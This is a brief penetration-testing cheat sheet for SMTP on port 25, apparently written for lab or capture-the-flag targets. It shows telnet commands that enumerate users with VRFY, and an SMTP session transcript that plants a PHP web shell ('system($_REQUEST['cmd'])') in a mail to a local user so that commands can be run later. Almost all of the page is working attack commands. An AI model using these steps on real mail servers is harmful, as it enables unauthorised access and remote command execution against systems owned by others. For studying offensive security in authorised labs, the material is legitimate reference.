SMTP (25)
Enumerate for Valid Email
telnet 10.10.10.10 25
EHLO test.domain.name #any.any.any
VRFY root@domain.nameSend Command Execute via Mail
telnet 10.10.10.7 25
EHLO test.domain.name #any.any.any
mail from: test@test.com
250 2.1.0 Ok
rcpt to: asterisk@localhost
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Subject: You have been pwned
<?php echo system($_REQUEST['cmd']); ?>
. # . to end the mail
250 2.0.0 Ok: queued as 8BAFDD92FDNmap
smtp-user enum
Last updated